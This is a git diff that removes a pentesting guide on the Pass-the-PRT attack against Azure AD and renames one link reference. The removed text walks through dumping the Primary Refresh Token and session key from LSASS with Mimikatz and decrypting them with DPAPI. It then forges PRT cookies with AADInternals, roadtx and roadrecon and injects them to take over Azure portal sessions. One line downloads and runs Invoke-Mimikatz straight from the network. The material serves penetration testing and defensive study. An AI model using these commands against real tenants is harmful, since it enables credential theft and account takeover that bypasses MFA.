-while($MimikatzPrt.Length % 4) {$MimikatzPrt += "="}
-
-# Decode
-$PRT=[text.encoding]::UTF8.GetString([convert]::FromBase64String($MimikatzPRT))
-
-# Mimikatz "Clear key" value
-$MimikatzClearKey="37c5ecdfeab49139288d8e7b0732a5c43fac53d3d36ca5629babf4ba5f1562f0"
-
-# Convert to Byte array and B64 encode
-$SKey = [convert]::ToBase64String( [byte[]] ($MimikatzClearKey -replace '..', '0x$&,' -split ',' -ne ''))
-
-# Generate PRTToken with Nonce
-$prtToken = New-AADIntUserPRTToken -RefreshToken $PRT -SessionKey $SKey -GetNonce
-$prtToken
-## You can already use this token ac cookie in the browser
-
-# Get access token from prtToken
-$AT = Get-AADIntAccessTokenForAzureCoreManagement -PRTToken $prtToken
-
-# Verify access and connect with Az. You can see account id in mimikatz prt output
-Connect-AzAccount -AccessToken $AT -TenantID <tenant-id> -AccountId <acc-id>
-```
-
-Go to [https://login.microsoftonline.com](https://login.microsoftonline.com), clear all cookies for login.microsoftonline.com and enter a new cookie.
-
-```
-Name: x-ms-RefreshTokenCredential
-Value: [Paste your output from above]
-Path: /
-HttpOnly: Set to True (checked)
-```
-
-Then go to [https://portal.azure.com](https://portal.azure.com)
-
-> [!CAUTION]
-> The rest should be the defaults. Make sure you can refresh the page and the cookie doesn’t disappear, if it does, you may have made a mistake and have to go through the process again. If it doesn’t, you should be good.
-
-### Attack - Mimikatz
-
-#### Steps
-
-1. The **PRT (Primary Refresh Token) is extracted from LSASS** (Local Security Authority Subsystem Service) and stored for subsequent use.
-2. The **Session Key is extracted next**. Given that this key is initially issued and then re-encrypted by the local device, it necessitates decryption using a DPAPI masterkey. Detailed information about DPAPI (Data Protection API) can be found in these resources: [HackTricks](https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html) and for an understanding of its application, refer to [Pass-the-cookie attack](az-pass-the-cookie.md).
-3. Post decryption of the Session Key, the **derived key and context for the PRT are obtained**. These are crucial for the **creation of the PRT cookie**. Specifically, the derived key is employed for signing the JWT (JSON Web Token) that constitutes the cookie. A comprehensive explanation of this process has been provided by Dirk-jan, accessible [here](https://dirkjanm.io/digging-further-into-the-primary-refresh-token/).
-
-> [!CAUTION]
-> Note that if the PRT is inside the TPM and not inside `lsass` **mimikatz won't be able to extract it**.\
-> However, it will be possible to g**et a key from a derive key from a context** from the TPM and use it to **sign a cookie (check option 3).**
-
-You can find an **in depth explanation of the performed process** to extract these details in here: [**https://dirkjanm.io/digging-further-into-the-primary-refresh-token/**](https://dirkjanm.io/digging-further-into-the-primary-refresh-token/)
-
-> [!WARNING]
-> This won't exactly work post August 2021 fixes to get other users PRT tokens as only the user can get his PRT (a local admin cannot access other users PRTs), but can access his.
-
-You can use **mimikatz** to extract the PRT:
-
-```bash
-mimikatz.exe
-Privilege::debug
-Sekurlsa::cloudap
-
-# Or in powershell
-iex (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1")
-Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::cloudap"'
-```
-
-(Images from https://blog.netwrix.com/2023/05/13/pass-the-prt-overview)
-
-<figure><img src="../../../images/image (251).png" alt=""><figcaption></figcaption></figure>
-
-**Copy** the part labeled **Prt** and save it.\
-Extract also the session key (the **`KeyValue`** of the **`ProofOfPossesionKey`** field) which you can see highlighted below. This is encrypted and we will need to use our DPAPI masterkeys to decrypt it.
-
-<figure><img src="../../../images/image (182).png" alt=""><figcaption></figcaption></figure>
-
-> [!NOTE]
-> If you don’t see any PRT data it could be that you **don’t have any PRTs** because your device isn’t Azure AD joined or it could be you are **running an old version** of Windows 10.
-
-To **decrypt** the session key you need to **elevate** your privileges to **SYSTEM** to run under the computer context to be able to use the **DPAPI masterkey to decrypt it**. You can use the following commands to do so:
-
-```
-token::elevate
-dpapi::cloudapkd /keyvalue:[PASTE ProofOfPosessionKey HERE] /unprotect
-```
-
-<figure><img src="../../../images/image (183).png" alt=""><figcaption></figcaption></figure>
-
-#### Option 1 - Full Mimikatz
-
-- Now you want to copy both the Context value:
-
-<figure><img src="../../../images/image (210).png" alt=""><figcaption></figcaption></figure>
-
-- And the derived key value:
-
-<figure><img src="../../../images/image (150).png" alt=""><figcaption></figcaption></figure>
-
-- Finally you can use all this info to **generate PRT cookies**:
-
-```bash
-Dpapi::cloudapkd /context:[CONTEXT] /derivedkey:[DerivedKey] /Prt:[PRT]
-```
-
-<figure><img src="../../../images/image (282).png" alt=""><figcaption></figcaption></figure>
-
-- Go to [https://login.microsoftonline.com](https://login.microsoftonline.com), clear all cookies for login.microsoftonline.com and enter a new cookie.
-
-```
-Name: x-ms-RefreshTokenCredential
-Value: [Paste your output from above]
-Path: /
-HttpOnly: Set to True (checked)
-```
-
-- Then go to [https://portal.azure.com](https://portal.azure.com)
-
-> [!CAUTION]
-> The rest should be the defaults. Make sure you can refresh the page and the cookie doesn’t disappear, if it does, you may have made a mistake and have to go through the process again. If it doesn’t, you should be good.
-
-#### Option 2 - roadrecon using PRT
-
-- Renew the PRT first, which will save it in `roadtx.prt`:
-
-```bash
-roadtx prt -a renew --prt <PRT From mimikatz> --prt-sessionkey <clear key from mimikatz>
-```
-
-- Now we can **request tokens** using the interactive browser with `roadtx browserprtauth`. If we use the `roadtx describe` command, we see the access token includes an MFA claim because the PRT I used in this case also had an MFA claim.
-
-```bash
-roadtx browserprtauth
-roadtx describe < .roadtools_auth
-```
-
-<figure><img src="../../../images/image (44).png" alt=""><figcaption></figcaption></figure>
-
-#### Option 3 - roadrecon using derived keys
-
-Having the context and the derived key dumped by mimikatz, it's possible to use roadrecon to generate a new signed cookie with:
-
-```bash
-roadrecon auth --prt-cookie <cookie> --prt-context <context> --derives-key <derived key>
-```
-
-## References
-
-- [https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-prt/](https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-prt/)
-- [https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/)
-- [https://www.youtube.com/watch?v=x609c-MUZ_g](https://www.youtube.com/watch?v=x609c-MUZ_g)
-
-{{#include ../../../banners/hacktricks-training.md}}
-
-
-

src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md

@@ -111,7 +111,7 @@ Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken
 Find more information about this kind of attack in the following page:
 
 {{#ref}}
-../../az-lateral-movement-cloud-on-prem/pass-the-prt.md
+../../az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
 {{#endref}}
 
 ## Tooling